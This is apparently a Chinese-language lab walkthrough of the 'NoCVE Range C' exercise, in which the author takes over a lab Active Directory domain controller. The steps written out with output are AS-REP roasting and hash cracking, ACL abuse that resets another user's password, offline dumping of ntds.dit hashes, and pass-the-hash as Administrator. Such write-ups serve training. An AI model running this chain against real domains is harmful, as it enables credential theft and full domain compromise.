NoCVE Range C

前言

https://mp.weixin.qq.com/s/XFIlP-0FdP60GEAx7SS6xA

环境

1
2
kali:192.168.120.2
靶机:192.168.120.128

初始凭据

1
alice:P@sswrd

枚举

smb枚举域

1
crackmapexec smb 192.168.120.0/24

image-20260208203138721

存在域:xya.com

存在机器:WIN-CU3ACHOT7GL.xya.com 192.168.120.128

nmap扫描

1
nmap -Pn -p- -sC -sV -oA nmap/full_scan_goad 192.168.120.128
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-08 07:34 EST
Nmap scan report for xya.com (192.168.120.128)
Host is up (0.00025s latency).
Not shown: 65510 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-02-08 13:35:18Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: xya.com, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: xya.com, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
49715/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 00:0C:29:EB:5D:AF (VMware)
Service Info: Host: WIN-CU3ACHOT7GL; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_nbstat: NetBIOS name: WIN-CU3ACHOT7GL, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:eb:5d:af (VMware)
| smb2-time: 
|   date: 2026-02-08T13:36:12
|_  start_date: N/A
|_clock-skew: 59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.04 seconds

192.168.120.128为域控

修改host

1
192.168.120.128 xya.com

枚举用户

1
crackmapexec smb 192.168.120.128 -u 'alice' -p 'P@sswrd' --users
1
2
3
4
5
6
7
8
9
10
SMB         192.168.120.128 445    WIN-CU3ACHOT7GL  xya.com\xya_admin                      badpwdcount: 0 desc:                                                                           
SMB         192.168.120.128 445    WIN-CU3ACHOT7GL  xya.com\vllay                          badpwdcount: 0 desc:                                                                           
SMB         192.168.120.128 445    WIN-CU3ACHOT7GL  xya.com\jake                           badpwdcount: 0 desc:                                                                           
SMB         192.168.120.128 445    WIN-CU3ACHOT7GL  xya.com\tolly                          badpwdcount: 0 desc:                                                                           
SMB         192.168.120.128 445    WIN-CU3ACHOT7GL  xya.com\calue                          badpwdcount: 0 desc:                                                                           
SMB         192.168.120.128 445    WIN-CU3ACHOT7GL  xya.com\wake                           badpwdcount: 0 desc:                                                                           
SMB         192.168.120.128 445    WIN-CU3ACHOT7GL  xya.com\alice                          badpwdcount: 0 desc:                                                                           
SMB         192.168.120.128 445    WIN-CU3ACHOT7GL  xya.com\krbtgt                         badpwdcount: 0 desc: Key Distribution Center Service Account                                   
SMB         192.168.120.128 445    WIN-CU3ACHOT7GL  xya.com\Guest                          badpwdcount: 0 desc: Built-in account for guest access to the computer/domain                  
SMB         192.168.120.128 445    WIN-CU3ACHOT7GL  xya.com\Administrator                  badpwdcount: 0 desc: Built-in account for administering the computer/domain

枚举共享资源

1
crackmapexec smb 192.168.120.128 -u 'alice' -p 'P@sswrd' --shares
1
2
3
4
5
6
7
SMB         192.168.120.128 445    WIN-CU3ACHOT7GL  Share           Permissions     Remark                                                                                                
SMB         192.168.120.128 445    WIN-CU3ACHOT7GL  -----           -----------     ------                                                                                                
SMB         192.168.120.128 445    WIN-CU3ACHOT7GL  ADMIN$                          Remote Admin                                                                                          
SMB         192.168.120.128 445    WIN-CU3ACHOT7GL  C$                              Default share                                                                                         
SMB         192.168.120.128 445    WIN-CU3ACHOT7GL  IPC$            READ            Remote IPC                                                                                            
SMB         192.168.120.128 445    WIN-CU3ACHOT7GL  NETLOGON        READ            Logon server share                                                                                    
SMB         192.168.120.128 445    WIN-CU3ACHOT7GL  SYSVOL          READ            Logon server share

使用smbclient进入后没有什么发现,ADMIN$ ,C$ 进不去,IPC$,NETLOGON ,SYSVOL 没有重要文件

密码喷洒

枚举密码策略

1
crackmapexec smb 192.168.120.128 -u 'alice' -p 'P@sswrd' --pass-pol

image-20260208205649644

密码策略显示账户锁定阈值为“None”。这意味着没有账户锁定策略,尝试错误密码不会锁定账户。

喷洒

1
crackmapexec smb 192.168.120.128 -u users.txt -p 'P@sswrd' --no-bruteforce

image-20260208205749443

均失败

kerberoasting

1
impacket-GetUserSPNs -request -dc-ip 192.168.120.128 xya.com/alice:P@sswrd -outputfile kerberoasting.hashes

失败

1
crackmapexec ldap 192.168.120.128 -u alice -p 'P@sswrd' -d xya.com --kerberoasting KERBEROASTING

失败

AS-REP Roasting

通过cme枚举的用户如下

1
2
3
4
5
6
7
8
9
10
xya_admin
vllay
jake
tolly
calue
wake
alice
krbtgt
Guest
Administrator

尝试使用 impacket工具包里的GetNPUsers.py 对所有用户进行 AS-REP Roasting:

1
impacket-GetNPUsers xya.com/ -no-pass -usersfile users.txt

得到vllayhash

1
2
3
$krb5asrep$23$vllay@XYA.COM:02312a12e9b5fe4b1d2710d41b885b10$a67aa273d4f7728551d80e57857a4f7787d22dd62e75da759416f51bd7cfe9241bd3f72fa6a970f4e2f4794896d6fa2eaed1aefe2a77707ad493bbd1f3fe6
7f9965501f5260a0d15d9f85ffa46f19c091cb5e3748ded5ce0814e023bf4d495e83f33e5e8f26da5d1c8ab0d7bab838e43fecec9d2f44218702c842f04be68a73f1916774d7ef6631ec8097ee65308eb1db61e27f753c0df0a4ee9aca
9c985f5b0b7fd2ad944639b3d1cd94229788aca060b229dfc9d5213437f149cbde7790a7071344f3e0689431496ae6a4460a077d5b18828cabd98acfc211368c5b02a489ae264

image-20260208213800414

破解

1
hashcat -m 18200 vllay.hash /usr/share/wordlists/rockyou.txt

image-20260208213929979

得到凭据

1
vllay:P@ssw0rd

winrm

已知的两组凭证分别登录winrm

alice失败

vllay成功

1
evil-winrm -i 192.168.120.128 -u vllay -p 'P@ssw0rd'

在Desktop找到第一个flag

1
flag{3142D7288BA5D443}

Bloodhound

采集

1
bloodhound-python --zip -c All -d xya.com -u alice -p P@sswrd -dc WIN-CU3ACHOT7GL.xya.com -ns 192.168.120.128

根据已获得的凭据alice与vllay进行搜索

1
2
3
4
alice和vllay对IT_SUPPORT组有addmenber权限
	IT_SUPPORT组对wake用户有WriteOwner属性
		wake用户对WIN-CU3ACHOIT7GL有远程powershell权限
			WIN-CU3ACHOIT7GL可以DCSync

image-20260208215915154

ACL滥用

AddMember

把vllay添加到IT_Support组

寻找DN

1
2
3
4
5
6
ldapsearch -H ldap://192.168.120.128 -x -D "vllay@xya.com" -w 'P@ssw0rd' -b "DC=xya,DC=com" "(sAMAccountName=vllay)" distinguishedName
CN=vllay,CN=Users,DC=xya,DC=com


ldapsearch -H ldap://192.168.120.128 -x -D "vllay@xya.com" -w 'P@ssw0rd' -b "DC=xya,DC=com" "(sAMAccountName=IT_Support)" distinguishedName
CN=IT_Support,CN=Users,DC=xya,DC=com

加入组

1
ldeep ldap -u vllay -p P@ssw0rd -d xya.com -s ldap://192.168.120.128 add_to_group "CN=vllay,CN=Users,DC=xya,DC=com" "CN=IT_Support,CN=Users,DC=xya,DC=com"

image-20260208221225214

查询

1
ldeep ldap -u vllay -p P@ssw0rd -d xya.com -s ldap://192.168.120.128 membersof 'IT_Support'

image-20260208221349174

Writeowner

将wake的owner 改为vllay

查看所有者

1
impacket-owneredit -action read -target 'wake' xya.com/vllay:P@ssw0rd
1
2
3
4
[*] Current owner information below                                                                                                                                                       
[*] - SID: S-1-5-21-3108373346-1578681561-945658689-512                                                                                                                                   
[*] - sAMAccountName: Domain Admins                                                                                                                                                       
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=xya,DC=com

修改所有者

1
impacket-owneredit -action write -new-owner 'vllay' -target 'wake' xya.com/vllay:P@ssw0rd

检查

1
impacket-owneredit -action read -target 'wake' xya.com/vllay:P@ssw0rd 
1
2
3
4
[*] Current owner information below                                                                                                                                                       
[*] - SID: S-1-5-21-3108373346-1578681561-945658689-1112                                                                                                                                  
[*] - sAMAccountName: vllay                                                                                                                                                               
[*] - distinguishedName: CN=vllay,CN=Users,DC=xya,DC=com

利用所有者权限添加完全控制权

1
impacket-dacledit -action write -rights FullControl -principal vllay -target 'wake' xya.com/vllay:P@ssw0rd 
1
2
[*] DACL backed up to dacledit-20260208-092136.bak                                                                                                                                        
[*] DACL modified successfully!

更改wake密码

1
2
rpcclient -U 'vllay%P@ssw0rd' 192.168.120.128
rpcclient $> setuserinfo2 wake 23 'P@ssw0rd'

image-20260208222813245

现在得到新的凭据

1
wake:P@ssw0rd

DCSync

1
impacket-secretsdump xya.com/wake:P@ssw0rd@192.168.120.128

失败,无权限

1
2
3
4
5
6
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied                                                                                                        
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)                                                                                                                             
[*] Using the DRSUAPI method to get NTDS.DIT secrets                                                                                                                                      
[-] DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid.                                                   
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter                                                                                                     
[*] Cleaning up...

寻找其他方向

解密NTDS

尝试登录wake

1
evil-winrm -i 192.168.120.128 -u wake -p 'P@ssw0rd'

登录后找到flag2

1
flag{F6D4ED8F870B54E0}

同时在当前目录还发现ntds.ditSYSTEM

image-20260208223103619

NTDS.dit

1
2
3
Windows Active Directory 的核心数据库文件,存放域内对象与属性:用户、计算机、组、密码哈希等目录信息的元数据。
文件格式是 ESE(Extensible Storage Engine)数据库(亦称 Jet Blue)。
极度敏感:一旦被复制并离线解析,攻击者可能获得大量账户信息与凭据(因此需要严密保护)

SYSTEM

1
2
3
Windows 的 SYSTEM 注册表 hive(通常文件 C:\Windows\System32\Config\SYSTEM)包含系统范围的配置信息。
在凭据转储/取证场景里,SYSTEM hive 常用来取得本机的 系统密钥(BootKey) 或用于恢复某些加密/存储的密钥(用于解密本机存储的凭证等),因此经常与 NTDS.dit 一起被用于离线分析。
也极为敏感,必须以受控方式处理。

下载

1
2
download ntds.dit
download SYSTEM

解密

1
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
┌──(root㉿kali)-[/home/kali/xya/nocve/c]
└─# impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xf8ea2ad7081a6ac6ff4e07a80572afac
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: bd833257b7223e78413115655773a5fc
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ece39e1190e04b11c0c21797feb2ec1e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-CU3ACHOT7GL$:1000:aad3b435b51404eeaad3b435b51404ee:ab7a4f9463a184b0192b51e298af43c4:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d92500b687a988e392652e5fc3f48eaa:::
alice:1103:aad3b435b51404eeaad3b435b51404ee:c328ad272ba9ef4d57bbd4bed522fc69:::
wake:1104:aad3b435b51404eeaad3b435b51404ee:222aae4cc7963a3042b600c1f3f0f6bc:::
calue:1106:aad3b435b51404eeaad3b435b51404ee:222aae4cc7963a3042b600c1f3f0f6bc:::
tolly:1107:aad3b435b51404eeaad3b435b51404ee:222aae4cc7963a3042b600c1f3f0f6bc:::
jake:1108:aad3b435b51404eeaad3b435b51404ee:222aae4cc7963a3042b600c1f3f0f6bc:::
vllay:1112:aad3b435b51404eeaad3b435b51404ee:f6cb7ec14bc5ca580704006e025e4dd3:::
xya_admin:2101:aad3b435b51404eeaad3b435b51404ee:ece39e1190e04b11c0c21797feb2ec1e:::
[*] Kerberos keys from ntds.dit 
Administrator:aes256-cts-hmac-sha1-96:c64e5ebc5f7b7ac425200b12eac0dfb70e36377052547242b185683eac422dcf
Administrator:aes128-cts-hmac-sha1-96:e126327fd843bfc06141b711523f003f
Administrator:des-cbc-md5:ead0b585e9fd3e5d
WIN-CU3ACHOT7GL$:aes256-cts-hmac-sha1-96:2a4adca7e157deed3fb6a7190f39350702e51b121db61348e1012d34090c97a4
WIN-CU3ACHOT7GL$:aes128-cts-hmac-sha1-96:4f15431a729544e72f04877cc3b2a44f
WIN-CU3ACHOT7GL$:des-cbc-md5:0210cbae0791bfa2
krbtgt:aes256-cts-hmac-sha1-96:8ff0e36703d9f78dc59cd3c088573b8a4165a580d979d6635e09280039bc5d8d
krbtgt:aes128-cts-hmac-sha1-96:3f2ad8009a57b7348c6f7ecce3257832
krbtgt:des-cbc-md5:ae9d46df9ee07329
alice:aes256-cts-hmac-sha1-96:6cf4da3b0fcfe546c53846347120a75a73ce5525e81f50f701fa832f2f7b81af
alice:aes128-cts-hmac-sha1-96:df55b0ff613061091bc830fd8b8f4840
alice:des-cbc-md5:5720d0adb5f132c1
wake:aes256-cts-hmac-sha1-96:522d98d6f6a652ecdd67199fd179472b2ea46d4d18caba5c79730f43311ce822
wake:aes128-cts-hmac-sha1-96:eb462f6bec63cdd2706f262cd08d3f02
wake:des-cbc-md5:e38ce651b05b644c
calue:aes256-cts-hmac-sha1-96:d5f5d517b6cd0d441bf57d552fda4820fa48e44536ab66319def8c8c0c380b09
calue:aes128-cts-hmac-sha1-96:3b4d13fb499e57cb7f4fd2da43f9d871
calue:des-cbc-md5:57e09829293792e9
tolly:aes256-cts-hmac-sha1-96:486674c0204b9fe8fc05db34e09c1e1a6044933a88bf339b3ea41b5827b30627
tolly:aes128-cts-hmac-sha1-96:f74894fc14c47cf9b53b800cece3db45
tolly:des-cbc-md5:d979b31c04296e3e
jake:aes256-cts-hmac-sha1-96:4c602224cfd25ef6c16c6dd841ec0abcd6b818ba1427355736cc5f73f347886a
jake:aes128-cts-hmac-sha1-96:f29553321fec926d84d9957abfb02e94
jake:des-cbc-md5:b938c4e35b4c973e
vllay:aes256-cts-hmac-sha1-96:da14c5fe39ed80368fb8642a6653bba13ab09a7f51e8e28a229a1720190cda1c
vllay:aes128-cts-hmac-sha1-96:6297112c7ab7baebb205ec33fdd1f5b5
vllay:des-cbc-md5:20b946cee00e3d9b
xya_admin:aes256-cts-hmac-sha1-96:1eacab403fff586a71215f63895668a504c4ab918c43920786540ca13995bb24
xya_admin:aes128-cts-hmac-sha1-96:5dd476d7000aaff99283b9a761594a43
xya_admin:des-cbc-md5:6bbac1324c137f26
[*] Cleaning up...

成功拿到hash

1
evil-winrm -i 192.168.120.128 -u Administrator -H 'ece39e1190e04b11c0c21797feb2ec1e'

登入域管

在Desktop找到第三个flag

1
flag{094E798635415378}
靶场
NoCVE Range C
http://xiaowu5.cn/2026/02/08/NoCVE-Range-C/
作者
5
发布于
2026年2月8日
许可协议
BY XIAOWU